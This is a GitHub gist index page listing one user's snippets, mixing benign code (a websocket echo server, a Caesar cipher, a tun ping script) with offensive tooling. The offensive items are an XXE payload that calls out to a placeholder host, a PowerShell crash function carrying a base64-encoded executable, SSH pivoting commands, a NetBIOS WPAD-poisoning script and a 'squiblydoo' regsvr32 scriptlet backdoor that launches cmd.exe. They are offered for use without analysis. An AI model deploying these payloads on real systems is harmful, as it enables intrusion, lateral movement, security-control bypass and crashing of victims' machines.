Skip to content

Instantly share code, notes, and snippets.

View 00derp's full-sized avatar

00derp

12 followers · 9 following
View GitHub Profile
@00derp
00derp / XXE_payloads
Created January 24, 2018 05:32 — forked from staaldraad/XXE_payloads
XXE Payloads
--------------------------------------------------------------
Vanilla, used to verify outbound xxe or blind xxe
--------------------------------------------------------------
<?xml version="1.0" ?>
<!DOCTYPE r [
<!ELEMENT r ANY >
<!ENTITY sp SYSTEM "http://x.x.x.x:443/test.txt">
]>
<r>&sp;</r>
@00derp
00derp / NotMyFault-Test1.ps1
Created October 20, 2017 16:04 — forked from D3F4LT99/NotMyFault-Test1.ps1
function Invoke-Crash
{
$ImputString = "TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAEAAA4fug4AtAnNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4gaW4gRE9TIG1vZGUuDQ0KJAAAAAAAAABRdKydFRXCzhUVws4VFcLOGEcjzjMVws4YRx3OBBXCzhhHIs6dFcLOHG1RzhgVws4VFcPOnhXCzmhsIs4WFcLOaGwjzhYVws4YRxnOFBXCzhUVVc4UFcLOaGwczhQVws5SaWNoFRXCzgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAFBFAABMAQQAu6BLVwAAAAAAAAAA4AADAQsBDAAANgEAAGQCAAAAAAAQWAAAABAAAABQAQAAAEAAABAAAAACAAAFAAEAAAAAAAUAAQAAAAAAANADAAAEAACQFwQAAwAAgQAAEAAAEAAAAAAQAAAQAAAAAAAAEAAAAAAAAAAAAAAAfAICAIwAAAAAUAIAGHIBAAAAAAAAAAAAAIADALA+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA+PwBAEAAAAAAAAAAAAAAAABQAQAIAgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAALnRleHQAAAAENAEAABAAAAA2AQAABAAAAAAAAAAAAAAAAAAAIAAAYC5yZGF0YQAA3L0AAABQAQAAvgAAADoBAAAAAAAAAAAAAAAAAEAAAEAuZGF0YQAAAOgxAAAAEAIAABQAAAD4AQAAAAAAAAAAAAAAAABAAADALnJzcmMAAAAYcgEAAFACAAB0AQAADAIAAAAAAAAAAAAAAAAAQAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
@00derp
00derp / ssh_tricks
Created January 17, 2017 22:53 — forked from sckalath/ssh_tricks
ssh kung fu
##SOCKS Proxy##
#Set up a SOCKS proxy on 127.0.0.1:1080 that lets you pivot through the remote host (10.0.0.1):
#Command line:
ssh -D 127.0.0.1:1080 10.0.0.1
#~/.ssh/config:
Host 10.0.0.1
DynamicForward 127.0.0.1:1080
#You can then use tsocks or similar to use non-SOCKS-aware tools on hosts accessible from 10.0.0.1:
@00derp
00derp / PythonSimpleWebsocket
Created December 20, 2016 13:22 — forked from rich20bb/PythonSimpleWebsocket
Simple websocket server in Python. Echos back whatever is received. Works with Chome, Firefox 16, IE 10.
import time
import struct
import socket
import hashlib
import base64
import sys
from select import select
import re
import logging
from threading import Thread
@00derp
00derp / caesar_cipher.py
Created November 25, 2016 02:47 — forked from nchitalov/caesar_cipher.py
def caesar_encrypt(realText, step):
outText = []
cryptText = []
uppercase = ['A', 'B', 'C', 'D', 'E', 'F', 'G', 'H', 'I', 'J', 'K', 'L', 'M', 'N', 'O', 'P', 'Q', 'R', 'S', 'T', 'U', 'V', 'W', 'X', 'Y', 'Z']
lowercase = ['a', 'b', 'c', 'd', 'e', 'f', 'g', 'h', 'i', 'j', 'k', 'l', 'm', 'n', 'o', 'p', 'q', 'r', 's', 't', 'u', 'v', 'w', 'x', 'y', 'z']
for eachLetter in realText:
if eachLetter in uppercase:
index = uppercase.index(eachLetter)
@00derp
00derp / netbios-brute-nat.rb
Created June 19, 2016 07:06
#!/usr/bin/env ruby
# -*- coding: binary -*-
require 'socket'
require 'ipaddr'
#
# Poison a system's NetBIOS resolver for the WPAD name from outside NAT (not BadTunnel)
#
# Usage: ruby netbios-brute-nat.rb <evil-wpad-server> <pps>
@00derp
00derp / Backdoor-Minimalist.sct
Created April 22, 2016 14:35
Execute Remote Scripts Via regsvr32.exe - Referred to As "squiblydoo" Please use this reference...
<?XML version="1.0"?>
<scriptlet>
<registration
progid="Empire"
classid="{F0001111-0000-0000-0000-0000FEEDACDC}" >
<!-- Proof Of Concept - Casey Smith @subTee -->
<script language="JScript">
<![CDATA[
var r = new ActiveXObject("WScript.Shell").Run("cmd.exe");
@00derp
00derp / tun-ping-linux.py
Last active August 29, 2015 14:06 — forked from glacjay/tun-ping-linux.py
import fcntl
import os
import struct
import subprocess
# Some constants used to ioctl the device file. I got them by a simple C
# program.
TUNSETIFF = 0x400454ca
TUNSETOWNER = TUNSETIFF + 2